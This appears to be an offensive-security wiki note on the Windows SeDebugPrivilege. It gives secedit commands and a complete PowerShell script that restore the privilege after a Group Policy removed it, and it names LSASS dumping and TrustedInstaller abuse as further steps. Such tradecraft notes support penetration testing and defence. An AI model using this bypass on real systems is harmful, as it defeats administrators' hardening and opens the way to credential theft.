SeDebugPrivilege
27.08.2023 · dadevel
A Windows privilege that allows opening a handle to any process, including those running as SYSTEM, and therefore gives an account that holds it a trivial path to SYSTEM and to credential theft, e.g. by dumping LSASS. By default it is assigned to the local Administrators group.
GPO Bypass
The debug privilege can be removed from all accounts via a GPO (User Rights Assignment, "Debug programs"), but a local administrator can bypass this restriction because secedit.exe applies a local security template on top of the policy.
Run whoami /priv as local admin and notice that SeDebugPrivilege is missing from the list, although Administrators hold it by default.
Export the current security policy to a file.
secedit.exe /export /cfg secpolicy.inf /areas USER_RIGHTS
Edit secpolicy.inf
to look like the following:
...
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
...
This allows the group of local administrators (SID S-1-5-32-544; the leading asterisk marks the value as a SID rather than an account name) to use the debug privilege again.
Import the modified policy. The piped J answers the confirmation prompt that /overwrite triggers on a German-language system; on an English Windows pipe Y instead.
echo J | secedit.exe /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS
In order for the changes to take effect you must log out and log in again, because the privileges of a token are fixed when it is created at logon. The changes will stay in effect until the next Group Policy refresh reapplies the GPO.
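The export, edit and import steps above in one script, as an added example that is not part of the original note. It reads and writes the template as UTF-16LE because that is the encoding secedit.exe exports, and it runs the import through cmd.exe so that the piped answer reaches the confirmation prompt exactly as in the command above. The answer Y is assumed for an English system (the note uses J for a German one); the file names and the Test-DebugPrivilege helper are the author's own choices.

```powershell
# Added example (not from the original note): give BUILTIN\Administrators the
# debug privilege back by editing the exported local security template and
# re-importing it. Assumes an elevated prompt and an English-language Windows
# (the /overwrite confirmation is answered with Y; use J on a German system).
$inf       = Join-Path $PWD 'secpolicy.inf'
$db        = Join-Path $PWD 'secedit.sdb'
$adminsSid = '*S-1-5-32-544'   # BUILTIN\Administrators, asterisk marks a SID

function Test-DebugPrivilege {
    # whoami /priv lists every privilege of the current token, enabled or not;
    # a missing line means the GPO removed it from our group.
    return [bool]((whoami /priv) -match '^SeDebugPrivilege')
}

Write-Host "SeDebugPrivilege present in current token: $(Test-DebugPrivilege)"

# 1. Export only the User Rights Assignment area of the effective local policy.
secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
if ($LASTEXITCODE -ne 0) { throw "secedit export failed" }

# 2. Rewrite (or insert) the SeDebugPrivilege line under [Privilege Rights].
#    secedit writes the template as UTF-16LE, so keep that encoding on both
#    read and write or the import will not parse the file.
$lines    = Get-Content -Path $inf -Encoding Unicode
$hasEntry = $lines | Where-Object { $_ -match '^\s*SeDebugPrivilege\s*=' }
$out = foreach ($line in $lines) {
    if ($line -match '^\s*SeDebugPrivilege\s*=') {
        "SeDebugPrivilege = $adminsSid"            # replace the GPO-emptied entry
    } elseif (-not $hasEntry -and $line -match '^\[Privilege Rights\]') {
        $line; "SeDebugPrivilege = $adminsSid"     # no entry at all: add one after the header
    } else {
        $line
    }
}
if (-not ($out -match '^\s*SeDebugPrivilege\s*=')) {
    throw "export contains no [Privilege Rights] section; nothing to patch"
}
Set-Content -Path $inf -Value $out -Encoding Unicode

# 3. Import the modified template into a fresh database and apply it. cmd.exe
#    is used so the piped answer is delivered to the /overwrite prompt.
cmd.exe /c "echo Y | secedit.exe /configure /db `"$db`" /cfg `"$inf`" /overwrite /areas USER_RIGHTS"
if ($LASTEXITCODE -ne 0) { throw "secedit configure failed, see $env:windir\security\logs\scesrv.log" }

# 4. Confirm the stored policy now lists Administrators. The running token is
#    unchanged: log off and on again, then run Test-DebugPrivilege once more.
secedit.exe /export /cfg "$inf.check" /areas USER_RIGHTS | Out-Null
Get-Content -Path "$inf.check" -Encoding Unicode | Select-String '^\s*SeDebugPrivilege'
Write-Host "Log off and on again; the new token carries the privilege until the next Group Policy refresh."
```

Step 4 checks the policy database rather than the token, which is the only thing that changes before a fresh logon; the same re-export is also a quick way to see whether a scheduled policy refresh has already reverted the change.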
Alternatively you can abuse TrustedInstaller: its token carries the debug privilege regardless of the User Rights Assignment policy, so code running as TrustedInstaller gets it without touching the local security template.